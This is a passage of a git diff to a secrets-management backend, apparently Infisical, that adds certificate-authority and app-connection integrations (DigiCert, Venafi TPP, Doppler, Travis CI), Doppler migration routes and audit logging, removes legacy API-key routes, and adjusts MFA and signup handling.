server.services.certificateAuthority.listCertificateAuthoritiesByProjectId( + { + projectId: req.query.projectId, + type: CaType.VENAFI_TPP + }, + req.permission + ); + await server.services.auditLog.createAuditLog({ ...req.auditLogInfo, projectId: req.query.projectId, @@ -83,7 +113,10 @@ export const registerCaRouter = async (server: FastifyZodProvider) => { ...(internalCas ?? []).map((ca) => ca.id), ...(acmeCas ?? []).map((ca) => ca.id), ...(azureAdCsCas ?? []).map((ca) => ca.id), - ...(awsPcaCas ?? []).map((ca) => ca.id) + ...(awsPcaCas ?? []).map((ca) => ca.id), + ...(digicertCas ?? []).map((ca) => ca.id), + ...(awsAcmPublicCas ?? []).map((ca) => ca.id), + ...(venafiTppCas ?? []).map((ca) => ca.id) ] } } @@ -94,7 +127,10 @@ export const registerCaRouter = async (server: FastifyZodProvider) => { ...(internalCas ?? []), ...(acmeCas ?? []), ...(azureAdCsCas ?? []), - ...(awsPcaCas ?? []) + ...(awsPcaCas ?? 
[]), + ...(digicertCas ?? []), + ...(awsAcmPublicCas ?? []), + ...(venafiTppCas ?? []) ] }; } diff --git a/backend/src/server/routes/v2/mfa-router.ts b/backend/src/server/routes/v2/mfa-router.ts index e85d09ffdfa..f8c6e5e2258 100644 --- a/backend/src/server/routes/v2/mfa-router.ts +++ b/backend/src/server/routes/v2/mfa-router.ts @@ -10,7 +10,7 @@ import { addAuthOriginDomainCookie } from "@app/server/lib/cookie"; import { AuthModeMfaJwtTokenPayload, AuthTokenType, MfaMethod } from "@app/services/auth/auth-type"; const handleMfaVerification = async ( - req: FastifyRequest & { mfa: { userId: string; orgId?: string; user: TUsers } }, + req: FastifyRequest & { mfa: { userId: string; orgId?: string; user: TUsers; requiredMfaMethod: MfaMethod } }, res: FastifyReply, server: FastifyZodProvider, mfaToken: string, @@ -31,6 +31,7 @@ const handleMfaVerification = async ( orgId: req.mfa.orgId, mfaToken, mfaMethod, + requiredMfaMethod: req.mfa.requiredMfaMethod, isRecoveryCode }); @@ -72,7 +73,12 @@ export const registerMfaRouter = async (server: FastifyZodProvider) => { const user = await server.store.user.findById(decodedToken.userId); if (!user) throw new Error("User not found"); - req.mfa = { userId: user.id, user, orgId: decodedToken.organizationId }; + req.mfa = { + userId: user.id, + user, + orgId: decodedToken.organizationId, + requiredMfaMethod: decodedToken.requiredMfaMethod + }; }); server.route({ @@ -90,7 +96,7 @@ export const registerMfaRouter = async (server: FastifyZodProvider) => { } }, handler: async (req) => { - await server.services.login.resendMfaToken(req.mfa.userId); + await server.services.login.resendMfaToken(req.mfa.userId, req.mfa.requiredMfaMethod); return { message: "Successfully send new mfa code" }; } }); diff --git a/backend/src/server/routes/v2/user-router.ts b/backend/src/server/routes/v2/user-router.ts index ac539549973..62810e5f304 100644 --- a/backend/src/server/routes/v2/user-router.ts +++ b/backend/src/server/routes/v2/user-router.ts @@ 
-1,7 +1,6 @@ import { z } from "zod"; import { AuthTokenSessionsSchema } from "@app/db/schemas"; -import { ApiKeysSchema } from "@app/db/schemas/api-keys"; import { readLimit, smtpRateLimit, writeLimit } from "@app/server/config/rateLimiter"; import { verifyAuth } from "@app/server/plugins/auth/verify-auth"; import { AuthMethod, AuthMode, MfaMethod } from "@app/services/auth/auth-type"; @@ -193,75 +192,6 @@ export const registerUserRouter = async (server: FastifyZodProvider) => { } }); - server.route({ - method: "GET", - url: "/me/api-keys", - config: { - rateLimit: readLimit - }, - schema: { - operationId: "listUserApiKeys", - response: { - 200: ApiKeysSchema.omit({ secretHash: true }).array() - } - }, - onRequest: verifyAuth([AuthMode.JWT]), - handler: async (req) => { - const apiKeys = await server.services.apiKey.getMyApiKeys(req.permission.id); - return apiKeys; - } - }); - - server.route({ - method: "POST", - url: "/me/api-keys", - config: { - rateLimit: writeLimit - }, - schema: { - operationId: "createUserApiKey", - body: z.object({ - name: z.string().trim(), - expiresIn: z.number() - }), - response: { - 200: z.object({ - apiKey: z.string(), - apiKeyData: ApiKeysSchema.omit({ secretHash: true }) - }) - } - }, - onRequest: verifyAuth([AuthMode.JWT]), - handler: async (req) => { - const apiKeys = await server.services.apiKey.createApiKey(req.permission.id, req.body.name, req.body.expiresIn); - return apiKeys; - } - }); - - server.route({ - method: "DELETE", - url: "/me/api-keys/:apiKeyDataId", - config: { - rateLimit: writeLimit - }, - schema: { - operationId: "deleteUserApiKey", - params: z.object({ - apiKeyDataId: z.string().trim() - }), - response: { - 200: z.object({ - apiKeyData: ApiKeysSchema.omit({ secretHash: true }) - }) - } - }, - onRequest: verifyAuth([AuthMode.JWT]), - handler: async (req) => { - const apiKeyData = await server.services.apiKey.deleteApiKey(req.permission.id, req.params.apiKeyDataId); - return { apiKeyData }; - } - }); - 
server.route({ method: "GET", url: "/me/sessions", diff --git a/backend/src/server/routes/v3/external-migration-router.ts b/backend/src/server/routes/v3/external-migration-router.ts index c44ecb4b181..59592bcfadf 100644 --- a/backend/src/server/routes/v3/external-migration-router.ts +++ b/backend/src/server/routes/v3/external-migration-router.ts @@ -1,13 +1,17 @@ import fastifyMultipart from "@fastify/multipart"; import { z } from "zod"; +import { EventType } from "@app/ee/services/audit-log/audit-log-types"; import { BadRequestError } from "@app/lib/errors"; import { readLimit, writeLimit } from "@app/server/config/rateLimiter"; import { verifyAuth } from "@app/server/plugins/auth/verify-auth"; import { AuthMode } from "@app/services/auth/auth-type"; import { - ExternalMigrationProviders, - VaultImportStatus, + ExternalMigrationConfigSchema, + ExternalMigrationProviders +} from "@app/services/external-migration/external-migration-schemas"; +import { + ExternalMigrationImportStatus, VaultMappingType } from "@app/services/external-migration/external-migration-types"; @@ -122,19 +126,22 @@ export const registerExternalMigrationRouter = async (server: FastifyZodProvider server.route({ method: "GET", - url: "/vault/configs", + url: "/:provider/configs", config: { rateLimit: readLimit }, schema: { - operationId: "getVaultExternalMigrationConfigsV3", + operationId: "getExternalMigrationConfigsV3", + params: z.object({ + provider: z.nativeEnum(ExternalMigrationProviders) + }), response: { 200: z.object({ configs: z .object({ id: z.string(), orgId: z.string(), - namespace: z.string(), + provider: z.string(), connectionId: z.string().nullish(), createdAt: z.date(), updatedAt: z.date() @@ -145,8 +152,9 @@ export const registerExternalMigrationRouter = async (server: FastifyZodProvider }, onRequest: verifyAuth([AuthMode.JWT]), handler: async (req) => { - const configs = await server.services.migration.getVaultExternalMigrationConfigs({ - actor: req.permission + const configs 
= await server.services.migration.getExternalMigrationConfigs({ + actor: req.permission, + provider: req.params.provider }); return { configs }; @@ -155,23 +163,26 @@ export const registerExternalMigrationRouter = async (server: FastifyZodProvider server.route({ method: "POST", - url: "/vault/configs", + url: "/:provider/configs", config: { rateLimit: writeLimit }, schema: { - operationId: "createVaultExternalMigrationV3", + operationId: "createExternalMigrationV3", + params: z.object({ + provider: z.nativeEnum(ExternalMigrationProviders) + }), body: z.object({ connectionId: z.string(), - namespace: z.string() + input: ExternalMigrationConfigSchema }), response: { 200: z.object({ config: z.object({ id: z.string(), orgId: z.string(), - namespace: z.string(), - connectionId: z.string().nullable().optional(), + provider: z.string(), + connectionId: z.string().nullish(), createdAt: z.date(), updatedAt: z.date() }) @@ -180,37 +191,52 @@ export const registerExternalMigrationRouter = async (server: FastifyZodProvider }, onRequest: verifyAuth([AuthMode.JWT]), handler: async (req) => { - const config = await server.services.migration.createVaultExternalMigration({ - ...req.body, + const config = await server.services.migration.createExternalMigration({ + config: req.body.input, + connectionId: req.body.connectionId, actor: req.permission }); + await server.services.auditLog.createAuditLog({ + orgId: req.permission.orgId, + ...req.auditLogInfo, + event: { + type: EventType.EXTERNAL_MIGRATION_CREATE, + metadata: { + configId: config.id, + provider: req.params.provider, + connectionId: req.body.connectionId + } + } + }); + return { config }; } }); server.route({ method: "PUT", - url: "/vault/configs/:id", + url: "/:provider/configs/:id", config: { rateLimit: writeLimit }, schema: { - operationId: "updateVaultExternalMigrationV3", + operationId: "updateExternalMigrationV3", params: z.object({ + provider: z.nativeEnum(ExternalMigrationProviders), id: z.string() }), body: 
z.object({ - connectionId: z.string(), - namespace: z.string() + connectionId: z.string().nullable(), + input: ExternalMigrationConfigSchema }), response: { 200: z.object({ config: z.object({ id: z.string(), orgId: z.string(), - namespace: z.string(), - connectionId: z.string().nullable().optional(), + provider: z.string(), + connectionId: z.string().nullish(), createdAt: z.date(), updatedAt: z.date() }) @@ -219,25 +245,40 @@ export const registerExternalMigrationRouter = async (server: FastifyZodProvider }, onRequest: verifyAuth([AuthMode.JWT]), handler: async (req) => { - const config = await server.services.migration.updateVaultExternalMigration({ + const config = await server.services.migration.updateExternalMigration({ id: req.params.id, - ...req.body, + config: req.body.input, + connectionId: req.body.connectionId, actor: req.permission }); + await server.services.auditLog.createAuditLog({ + orgId: req.permission.orgId, + ...req.auditLogInfo, + event: { + type: EventType.EXTERNAL_MIGRATION_UPDATE, + metadata: { + configId: req.params.id, + provider: req.params.provider, + connectionId: req.body.connectionId + } + } + }); + return { config }; } }); server.route({ method: "DELETE", - url: "/vault/configs/:id", + url: "/:provider/configs/:id", config: { rateLimit: writeLimit }, schema: { - operationId: "deleteVaultExternalMigrationV3", + operationId: "deleteExternalMigrationV3", params: z.object({ + provider: z.nativeEnum(ExternalMigrationProviders), id: z.string() }), response: { @@ -245,8 +286,8 @@ export const registerExternalMigrationRouter = async (server: FastifyZodProvider config: z.object({ id: z.string(), orgId: z.string(), - namespace: z.string(), - connectionId: z.string().nullable().optional(), + provider: z.string(), + connectionId: z.string().nullish(), createdAt: z.date(), updatedAt: z.date() }) @@ -255,11 +296,23 @@ export const registerExternalMigrationRouter = async (server: FastifyZodProvider }, onRequest: verifyAuth([AuthMode.JWT]), handler: 
async (req) => { - const config = await server.services.migration.deleteVaultExternalMigration({ + const config = await server.services.migration.deleteExternalMigration({ id: req.params.id, actor: req.permission }); + await server.services.auditLog.createAuditLog({ + orgId: req.permission.orgId, + ...req.auditLogInfo, + event: { + type: EventType.EXTERNAL_MIGRATION_DELETE, + metadata: { + configId: req.params.id, + provider: req.params.provider + } + } + }); + return { config }; } }); @@ -274,7 +327,7 @@ export const registerExternalMigrationRouter = async (server: FastifyZodProvider operationId: "getVaultNamespacesV3", response: { 200: z.object({ - namespaces: z.array(z.object({ id: z.string(), name: z.string() })) + namespaces: z.array(z.object({ id: z.string().nullish(), name: z.string().nullish() })) }) } }, @@ -387,11 +440,11 @@ export const registerExternalMigrationRouter = async (server: FastifyZodProvider environment: z.string(), secretPath: z.string(), vaultNamespace: z.string(), - vaultSecretPath: z.string() + vaultSecretPaths: z.array(z.string()).min(1) }), response: { 200: z.object({ - status: z.nativeEnum(VaultImportStatus) + status: z.nativeEnum(ExternalMigrationImportStatus) }) } }, @@ -639,4 +692,135 @@ export const registerExternalMigrationRouter = async (server: FastifyZodProvider return { roles }; } }); + + // ─── Doppler In-Platform Migration Routes ──────────────────────────────────── + + server.route({ + method: "GET", + url: "/doppler/projects", + config: { rateLimit: readLimit }, + schema: { + operationId: "getDopplerProjectsV3", + querystring: z.object({ configId: z.string().uuid() }), + response: { + 200: z.object({ + projects: z + .object({ + id: z.string(), + slug: z.string(), + name: z.string(), + description: z.string().nullish() + }) + .array() + }) + } + }, + onRequest: verifyAuth([AuthMode.JWT]), + handler: async (req) => { + const projects = await server.services.migration.getDopplerProjects({ + configId: req.query.configId, + 
actor: req.permission + }); + return { projects }; + } + }); + + server.route({ + method: "GET", + url: "/doppler/environments", + config: { rateLimit: readLimit }, + schema: { + operationId: "getDopplerEnvironmentsV3", + querystring: z.object({ + configId: z.string().uuid(), + projectSlug: z.string().min(1) + }), + response: { + 200: z.object({ + environments: z + .object({ + id: z.string(), + slug: z.string(), + name: z.string(), + project: z.string(), + parentId: z.string().nullish() + }) + .array() + }) + } + }, + onRequest: verifyAuth([AuthMode.JWT]), + handler: async (req) => { + const environments = await server.services.migration.getDopplerEnvironments({ + configId: req.query.configId, + projectSlug: req.query.projectSlug, + actor: req.permission + }); + return { environments }; + } + }); + + server.route({ + method: "GET", + url: "/doppler/doppler-configs", + config: { rateLimit: readLimit }, + schema: { + operationId: "getDopplerConfigsV3", + querystring: z.object({ + configId: z.string().uuid(), + projectSlug: z.string().min(1) + }), + response: { + 200: z.object({ + configs: z + .object({ + name: z.string(), + root: z.boolean(), + locked: z.boolean(), + environment: z.string(), + project: z.string() + }) + .array() + }) + } + }, + onRequest: verifyAuth([AuthMode.JWT]), + handler: async (req) => { + const configs = await server.services.migration.getDopplerConfigs({ + configId: req.query.configId, + projectSlug: req.query.projectSlug, + actor: req.permission + }); + return { configs }; + } + }); + + server.route({ + method: "POST", + url: "/doppler/import-secrets", + config: { rateLimit: writeLimit }, + schema: { + operationId: "importDopplerSecretsV3", + body: z.object({ + configId: z.string().uuid(), + dopplerProject: z.string().min(1), + dopplerEnvironment: z.string().min(1), + targetProjectId: z.string().min(1), + targetEnvironment: z.string().min(1), + targetSecretPath: z.string().min(1).default("/") + }), + response: { + 200: z.object({ status: 
z.string(), imported: z.number() }) + } + }, + onRequest: verifyAuth([AuthMode.JWT]), + handler: async (req) => { + const result = await server.services.migration.importDopplerSecrets({ + ...req.body, + actor: req.permission, + auditLogInfo: req.auditLogInfo + }); + return result; + } + }); }; diff --git a/backend/src/server/routes/v3/index.ts b/backend/src/server/routes/v3/index.ts index c770d089010..6df801082cb 100644 --- a/backend/src/server/routes/v3/index.ts +++ b/backend/src/server/routes/v3/index.ts @@ -3,12 +3,10 @@ import { registerDeprecatedSecretRouter } from "./deprecated-secret-router"; import { registerExternalMigrationRouter } from "./external-migration-router"; import { registerLoginRouter } from "./login-router"; import { registerSignupRouter } from "./signup-router"; -import { registerUserRouter } from "./user-router"; export const registerV3Routes = async (server: FastifyZodProvider) => { await server.register(registerSignupRouter, { prefix: "/signup" }); await server.register(registerLoginRouter, { prefix: "/auth" }); - await server.register(registerUserRouter, { prefix: "/users" }); await server.register(registerDeprecatedSecretRouter, { prefix: "/secrets" }); await server.register(registerExternalMigrationRouter, { prefix: "/external-migration" }); await server.register(registerCertificatesRouter, { prefix: "/pki/certificates" }); diff --git a/backend/src/server/routes/v3/login-router.ts b/backend/src/server/routes/v3/login-router.ts index a13a814ec62..eed36d57bdd 100644 --- a/backend/src/server/routes/v3/login-router.ts +++ b/backend/src/server/routes/v3/login-router.ts @@ -5,8 +5,10 @@ import { getConfig } from "@app/lib/config/env"; import { UnauthorizedError } from "@app/lib/errors"; import { authRateLimit } from "@app/server/config/rateLimiter"; import { addAuthOriginDomainCookie } from "@app/server/lib/cookie"; +import { getUserAgentType } from "@app/server/plugins/audit-log"; import { verifyAuth } from 
"@app/server/plugins/auth/verify-auth"; import { AuthMode } from "@app/services/auth/auth-type"; +import { PostHogEventTypes } from "@app/services/telemetry/telemetry-types"; export const registerLoginRouter = async (server: FastifyZodProvider) => { server.route({ @@ -176,6 +178,15 @@ export const registerLoginRouter = async (server: FastifyZodProvider) => { }, { skipDedup: true } ); + + void server.services.telemetry.sendPostHogEvents({ + event: PostHogEventTypes.UserLoginV2, + distinctId: loginDistinctId, + properties: { + email: req.body.email, + channel: getUserAgentType(userAgent) + } + }); } void res.setCookie("jid", tokens.refreshToken, { diff --git a/backend/src/server/routes/v3/signup-router.ts b/backend/src/server/routes/v3/signup-router.ts index c6b079746da..033dae9d54a 100644 --- a/backend/src/server/routes/v3/signup-router.ts +++ b/backend/src/server/routes/v3/signup-router.ts @@ -106,11 +106,13 @@ export const registerSignupRouter = async (server: FastifyZodProvider) => { lastName: z.string().trim().optional(), attributionSource: z.string().trim().optional(), password: z.string(), - organizationName: GenericResourceNameSchema.optional() + organizationName: GenericResourceNameSchema.optional(), + hubspotUtk: z.string().trim().max(512).optional() }), z.object({ type: z.literal(CompleteAccountType.Alias), - code: z.string().trim() + code: z.string().trim(), + hubspotUtk: z.string().trim().max(512).optional() }) ]), response: { @@ -126,7 +128,7 @@ export const registerSignupRouter = async (server: FastifyZodProvider) => { if (!userAgent) throw new Error("user agent header is required"); const appCfg = getConfig(); - const { user, accessToken, refreshToken, authMethod, organizationId } = + const { user, accessToken, refreshToken, authMethod, organizationId, isInvitedUser } = await server.services.signup.completeAccount({ ...req.body, ip: req.realIp, @@ -138,12 +140,14 @@ export const registerSignupRouter = async (server: FastifyZodProvider) => { void 
server.services.telemetry.sendLoopsEvent(user.email, user.firstName || "", user.lastName || ""); void server.services.telemetry.sendHubSpotSignupEvent( user.email, - authMethod, + isInvitedUser ? "invite" : authMethod, user.firstName || "", - user.lastName || "" + user.lastName || "", + req.body.hubspotUtk ); } + const bodyAttributionSource = "attributionSource" in req.body ? req.body.attributionSource : undefined; void server.services.telemetry.sendPostHogEvents({ event: PostHogEventTypes.UserSignedUp, distinctId: user.username ?? "", @@ -151,7 +155,7 @@ export const registerSignupRouter = async (server: FastifyZodProvider) => { properties: { username: user.username, email: user.email ?? "", - attributionSource: "attributionSource" in req.body ? req.body.attributionSource : undefined + attributionSource: isInvitedUser ? "Team Invite" : bodyAttributionSource } }); diff --git a/backend/src/server/routes/v3/user-router.ts b/backend/src/server/routes/v3/user-router.ts deleted file mode 100644 index 41d7dce0868..00000000000 --- a/backend/src/server/routes/v3/user-router.ts +++ /dev/null @@ -1,29 +0,0 @@ -import { z } from "zod"; - -import { ApiKeysSchema } from "@app/db/schemas/api-keys"; -import { readLimit } from "@app/server/config/rateLimiter"; -import { verifyAuth } from "@app/server/plugins/auth/verify-auth"; -import { AuthMode } from "@app/services/auth/auth-type"; - -export const registerUserRouter = async (server: FastifyZodProvider) => { - server.route({ - method: "GET", - url: "/me/api-keys", - config: { - rateLimit: readLimit - }, - schema: { - operationId: "getMyApiKeysV3", - response: { - 200: z.object({ - apiKeyData: ApiKeysSchema.omit({ secretHash: true }).array() - }) - } - }, - onRequest: verifyAuth([AuthMode.JWT]), - handler: async (req) => { - const apiKeyData = await server.services.apiKey.getMyApiKeys(req.permission.id); - return { apiKeyData }; - } - }); -}; diff --git a/backend/src/services/account-recovery/account-recovery-service.ts 
b/backend/src/services/account-recovery/account-recovery-service.ts index b37247e654c..c773f888a8f 100644 --- a/backend/src/services/account-recovery/account-recovery-service.ts +++ b/backend/src/services/account-recovery/account-recovery-service.ts @@ -112,7 +112,7 @@ export const accountRecoveryServiceFactory = ({ const token = crypto.jwt().sign( { - authTokenType: AuthTokenType.SIGNUP_TOKEN, + authTokenType: AuthTokenType.ACCOUNT_RECOVERY_TOKEN, userId: user.id }, cfg.AUTH_SECRET, diff --git a/backend/src/services/additional-privilege/project/project-additional-privilege-factory.ts b/backend/src/services/additional-privilege/project/project-additional-privilege-factory.ts index 9fbc7f665fc..6dedc7fdddc 100644 --- a/backend/src/services/additional-privilege/project/project-additional-privilege-factory.ts +++ b/backend/src/services/additional-privilege/project/project-additional-privilege-factory.ts @@ -13,6 +13,8 @@ import { ProjectPermissionSub } from "@app/ee/services/permission/project-permission"; import { BadRequestError, NotFoundError, PermissionBoundaryError } from "@app/lib/errors"; +import { requestMemoKeys } from "@app/lib/request-context/memo-keys"; +import { requestMemoize } from "@app/lib/request-context/request-memoizer"; import { OrgServiceActor } from "@app/lib/types"; import { unpackPermissions } from "@app/server/routes/sanitizedSchema/permission"; import { ActorType } from "@app/services/auth/auth-type"; @@ -413,7 +415,10 @@ export const newProjectAdditionalPrivilegesFactory = ({ : ([ProjectPermissionIdentityActions.Edit, ProjectPermissionSub.Identity] as const); ForbiddenError.from(permission).throwUnlessCan(...permissionSet); - const { shouldUseNewPrivilegeSystem } = await orgDAL.findById(dto.permission.orgId); + const { shouldUseNewPrivilegeSystem } = await requestMemoize( + requestMemoKeys.orgFindById(dto.permission.orgId), + () => orgDAL.findById(dto.permission.orgId) + ); const { permission: targetUserPermission, memberships } = await 
$getPermission( { ...dto.permission, type: actorType, id: actorId }, scope.value @@ -454,7 +459,10 @@ export const newProjectAdditionalPrivilegesFactory = ({ : ([ProjectPermissionIdentityActions.Edit, ProjectPermissionSub.Identity] as const); ForbiddenError.from(permission).throwUnlessCan(...permissionSet); - const { shouldUseNewPrivilegeSystem } = await orgDAL.findById(dto.permission.orgId); + const { shouldUseNewPrivilegeSystem } = await requestMemoize( + requestMemoKeys.orgFindById(dto.permission.orgId), + () => orgDAL.findById(dto.permission.orgId) + ); const { permission: targetUserPermission, memberships } = await $getPermission( { ...dto.permission, type: actorType, id: actorId }, scope.value diff --git a/backend/src/services/api-key/api-key-dal.ts b/backend/src/services/api-key/api-key-dal.ts deleted file mode 100644 index 128adc7013f..00000000000 --- a/backend/src/services/api-key/api-key-dal.ts +++ /dev/null @@ -1,7 +0,0 @@ -import { TDbClient } from "@app/db"; -import { TableName } from "@app/db/schemas"; -import { ormify } from "@app/lib/knex"; - -export type TApiKeyDALFactory = ReturnType; - -export const apiKeyDALFactory = (db: TDbClient) => ormify(db, TableName.ApiKey); diff --git a/backend/src/services/api-key/api-key-service.ts b/backend/src/services/api-key/api-key-service.ts deleted file mode 100644 index b928bbd6de6..00000000000 --- a/backend/src/services/api-key/api-key-service.ts +++ /dev/null @@ -1,72 +0,0 @@ -import { TApiKeys } from "@app/db/schemas/api-keys"; -import { getConfig } from "@app/lib/config/env"; -import { crypto } from "@app/lib/crypto/cryptography"; -import { NotFoundError, UnauthorizedError } from "@app/lib/errors"; - -import { TUserDALFactory } from "../user/user-dal"; -import { TApiKeyDALFactory } from "./api-key-dal"; - -type TApiKeyServiceFactoryDep = { - apiKeyDAL: TApiKeyDALFactory; - userDAL: Pick; -}; - -export type TApiKeyServiceFactory = ReturnType; - -const formatApiKey = ({ secretHash, ...data }: TApiKeys) => 
data; - -export const apiKeyServiceFactory = ({ apiKeyDAL, userDAL }: TApiKeyServiceFactoryDep) => { - const getMyApiKeys = async (userId: string) => { - const apiKeys = await apiKeyDAL.find({ userId }); - return apiKeys.map((key) => formatApiKey(key)); - }; - - const createApiKey = async (userId: string, name: string, expiresIn: number) => { - const appCfg = getConfig(); - const secret = crypto.randomBytes(16).toString("hex"); - const secretHash = await crypto.hashing().createHash(secret, appCfg.SALT_ROUNDS); - const expiresAt = new Date(); - expiresAt.setSeconds(expiresAt.getSeconds() + expiresIn); - - const apiKeyData = await apiKeyDAL.create({ - userId, - name, - expiresAt, - secretHash, - lastUsed: new Date() - }); - const apiKey = `ak.${apiKeyData.id}.${secret}`; - - return { apiKey, apiKeyData: formatApiKey(apiKeyData) }; - }; - - const deleteApiKey = async (userId: string, apiKeyId: string) => { - const [apiKeyData] = await apiKeyDAL.delete({ id: apiKeyId, userId }); - if (!apiKeyData) throw new NotFoundError({ message: `API key with ID '${apiKeyId}' not found` }); - return formatApiKey(apiKeyData); - }; - - const fnValidateApiKey = async (token: string) => { - const [, TOKEN_IDENTIFIER, TOKEN_SECRET] = <[string, string, string]>token.split(".", 3); - const apiKey = await apiKeyDAL.findById(TOKEN_IDENTIFIER); - if (!apiKey) throw new UnauthorizedError(); - - if (apiKey.expiresAt && new Date(apiKey.expiresAt) < new Date()) { - await apiKeyDAL.deleteById(apiKey.id); - throw new UnauthorizedError(); - } - - const isMatch = await crypto.hashing().compareHash(TOKEN_SECRET, apiKey.secretHash); - if (!isMatch) throw new UnauthorizedError(); - await apiKeyDAL.updateById(apiKey.id, { lastUsed: new Date() }); - const user = await userDAL.findById(apiKey.userId); - return user; - }; - - return { - getMyApiKeys, - createApiKey, - deleteApiKey, - fnValidateApiKey - }; -}; diff --git a/backend/src/services/api-key/api-key-types.ts 
b/backend/src/services/api-key/api-key-types.ts deleted file mode 100644 index e69de29bb2d..00000000000 diff --git a/backend/src/services/app-connection/app-connection-enums.ts b/backend/src/services/app-connection/app-connection-enums.ts index fe4dcf4d06c..9699f93854e 100644 --- a/backend/src/services/app-connection/app-connection-enums.ts +++ b/backend/src/services/app-connection/app-connection-enums.ts @@ -52,9 +52,14 @@ export enum AppConnection { CircleCI = "circleci", AzureEntraId = "azure-entra-id", Venafi = "venafi", + VenafiTpp = "venafi-tpp", ExternalInfisical = "external-infisical", + Doppler = "doppler", NetScaler = "netscaler", - Anthropic = "anthropic" + Anthropic = "anthropic", + Ona = "ona", + DigiCert = "digicert", + TravisCI = "travis-ci" } export enum AWSRegion { diff --git a/backend/src/services/app-connection/app-connection-fns.ts b/backend/src/services/app-connection/app-connection-fns.ts index 5295ee62c45..359f8d4608a 100644 --- a/backend/src/services/app-connection/app-connection-fns.ts +++ b/backend/src/services/app-connection/app-connection-fns.ts @@ -108,6 +108,11 @@ import { validateDatabricksConnectionCredentials } from "./databricks/databricks-connection-fns"; import { DbtConnectionMethod, getDbtConnectionListItem, validateDbtConnectionCredentials } from "./dbt"; +import { + DigiCertConnectionMethod, + getDigiCertConnectionListItem, + validateDigiCertConnectionCredentials +} from "./digicert"; import { DigitalOceanConnectionMethod, getDigitalOceanConnectionListItem, @@ -118,6 +123,7 @@ import { getDNSMadeEasyConnectionListItem, validateDNSMadeEasyConnectionCredentials } from "./dns-made-easy/dns-made-easy-connection-fns"; +import { DopplerConnectionMethod, getDopplerConnectionListItem, validateDopplerConnectionCredentials } from "./doppler"; import { ExternalInfisicalConnectionMethod, getExternalInfisicalConnectionListItem, @@ -173,6 +179,7 @@ import { validateOctopusDeployConnectionCredentials } from "./octopus-deploy"; import { 
getOktaConnectionListItem, OktaConnectionMethod, validateOktaConnectionCredentials } from "./okta"; +import { getOnaConnectionListItem, OnaConnectionMethod, validateOnaConnectionCredentials } from "./ona"; import { getOpenRouterConnectionListItem, OpenRouterConnectionMethod, @@ -200,7 +207,18 @@ import { TerraformCloudConnectionMethod, validateTerraformCloudConnectionCredentials } from "./terraform-cloud"; +import { + getTravisCIConnectionListItem, + TravisCIConnectionMethod, + validateTravisCIConnectionCredentials +} from "./travis-ci"; import { getVenafiConnectionListItem, validateVenafiConnectionCredentials, VenafiConnectionMethod } from "./venafi"; +import { + getVenafiTppConnectionListItem, + validateVenafiTppConnectionCredentials, + VenafiTppConnectionMethod +} from "./venafi-tpp"; +import { TVenafiTppConnectionConfig } from "./venafi-tpp/venafi-tpp-connection-types"; import { VercelConnectionMethod } from "./vercel"; import { getVercelConnectionListItem, validateVercelConnectionCredentials } from "./vercel/vercel-connection-fns"; import { @@ -232,7 +250,9 @@ const PKI_APP_CONNECTIONS = [ AppConnection.DNSMadeEasy, AppConnection.AzureDNS, AppConnection.Venafi, - AppConnection.NetScaler + AppConnection.VenafiTpp, + AppConnection.NetScaler, + AppConnection.DigiCert ]; export const listAppConnectionOptions = (projectType?: ProjectType) => { @@ -291,8 +311,13 @@ export const listAppConnectionOptions = (projectType?: ProjectType) => { getCircleCIConnectionListItem(), getAzureEntraIdConnectionListItem(), getVenafiConnectionListItem(), + getVenafiTppConnectionListItem(), getExternalInfisicalConnectionListItem(), - getNetScalerConnectionListItem() + getDopplerConnectionListItem(), + getNetScalerConnectionListItem(), + getOnaConnectionListItem(), + getDigiCertConnectionListItem(), + getTravisCIConnectionListItem() ] .filter((option) => { switch (projectType) { @@ -438,12 +463,21 @@ export const validateAppConnectionCredentials = async ( [AppConnection.CircleCI]: 
validateCircleCIConnectionCredentials as TAppConnectionCredentialsValidator, [AppConnection.AzureEntraId]: validateAzureEntraIdConnectionCredentials as TAppConnectionCredentialsValidator, [AppConnection.Venafi]: validateVenafiConnectionCredentials as TAppConnectionCredentialsValidator, + [AppConnection.VenafiTpp]: ((config: TAppConnectionConfig) => + validateVenafiTppConnectionCredentials( + config as TVenafiTppConnectionConfig, + gatewayV2Service + )) as TAppConnectionCredentialsValidator, [AppConnection.NetScaler]: validateNetScalerConnectionCredentials as TAppConnectionCredentialsValidator, + [AppConnection.Ona]: validateOnaConnectionCredentials as TAppConnectionCredentialsValidator, + [AppConnection.TravisCI]: validateTravisCIConnectionCredentials as TAppConnectionCredentialsValidator, [AppConnection.ExternalInfisical]: ((config: TAppConnectionConfig) => validateExternalInfisicalConnectionCredentials( config as TExternalInfisicalConnectionConfig, deps.identityUaDAL - )) as TAppConnectionCredentialsValidator + )) as TAppConnectionCredentialsValidator, + [AppConnection.Doppler]: validateDopplerConnectionCredentials as TAppConnectionCredentialsValidator, + [AppConnection.DigiCert]: validateDigiCertConnectionCredentials as TAppConnectionCredentialsValidator }; return VALIDATE_APP_CONNECTION_CREDENTIALS_MAP[appConnection.app](appConnection, gatewayService, gatewayV2Service); @@ -455,6 +489,7 @@ export const getAppConnectionMethodName = (method: TAppConnection["method"]) => case GitHubRadarConnectionMethod.App: return "GitHub App"; case GitHubConnectionMethod.Pat: + case OnaConnectionMethod.PersonalAccessToken: return "Personal Access Token"; case AzureKeyVaultConnectionMethod.OAuth: case AzureAppConfigurationConnectionMethod.OAuth: @@ -463,6 +498,7 @@ export const getAppConnectionMethodName = (method: TAppConnection["method"]) => case AzureDevOpsConnectionMethod.OAuth: case HerokuConnectionMethod.OAuth: case GitLabConnectionMethod.OAuth: + case 
